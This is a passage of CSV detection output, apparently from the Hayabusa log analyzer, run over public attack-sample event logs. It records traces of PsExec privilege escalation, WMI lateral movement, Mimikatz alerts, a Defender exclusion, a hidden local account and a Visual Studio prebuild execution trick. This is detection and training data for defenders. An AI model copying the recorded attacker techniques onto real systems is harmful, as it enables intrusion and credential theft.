| Parent Cmd: ? 
| LID: 0x3e7 | PID: 16344 | PGUID: 747F3D96-00D9-5FD1-0000-001021855301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Service Start,,rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Tool Execution,,rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: System | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:42.933 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50335 () | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:42.934 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50336 () | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 876 | PGUID: 747F3D96-76FB-5FD1-0000-0010E6C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 | Process: C:\Windows\System32\mspaint.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 7988 | PGUID: 747F3D96-00DD-5FD1-0000-0010F7D25301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 07:45:33.090 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onedrive.exe | Process: System | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx +2020-12-10 07:45:34.204 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49791 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 
747F3D96-CDE2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx +2020-12-10 20:18:52.190 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49851 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 20:18:52.191 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49852 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 20:18:52.447 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49853 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:49847 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 2784 | PGUID: 747F3D96-FFEE-5FD1-0000-00101DDF0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? 
| LID: 0x3e5 | PID: 5580 | PGUID: 747F3D96-041E-5FD2-0000-001024DF3B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant 
Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50007 (MSEDGEWIN10) | Dst: 10.0.2.17:135 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50008 (MSEDGEWIN10) | Dst: 10.0.2.17:49666 
(MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-17 19:38:33.951 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: WCESERVICE | Path: D:\Service\test.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2020-12-19 02:56:07.017 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Hidden Local Account Created | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\hideme0007$\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 
747F3D96-68DD-5FDD-0000-00101B660000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_hidden_local_account_sysmon.evtx +2021-01-26 22:21:13.237 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\~DF0187A90594A6AC9B.TMP | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.558 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\b8162606fcd2bea192a83c85aaff3292f908cfde | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.560 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.561 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 
00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.683 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.log | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln"" | LID: 0x26f746a2 | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.972 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\blabla.lastbuildstate | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Windows\SysWOW64\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 23168 | PGUID: 00247C92-1749-6010-0000-0010EFAAD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: powershell.exe start-process notepad.exe | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | User: 
LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | LID: 0x26f746a2 | PID: 18548 | PGUID: 00247C92-174A-6010-0000-0010C0B2D92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\SysWOW64\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: powershell.exe start-process notepad.exe | LID: 0x26f746a2 | PID: 28276 | PGUID: 00247C92-174A-6010-0000-001042DDD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.399 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" 
@""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 18188 | PGUID: 00247C92-174A-6010-0000-0010DCFFD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | LID: 0x26f746a2 | PID: 11676 | PGUID: 00247C92-174A-6010-0000-0010A20ADA2E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program 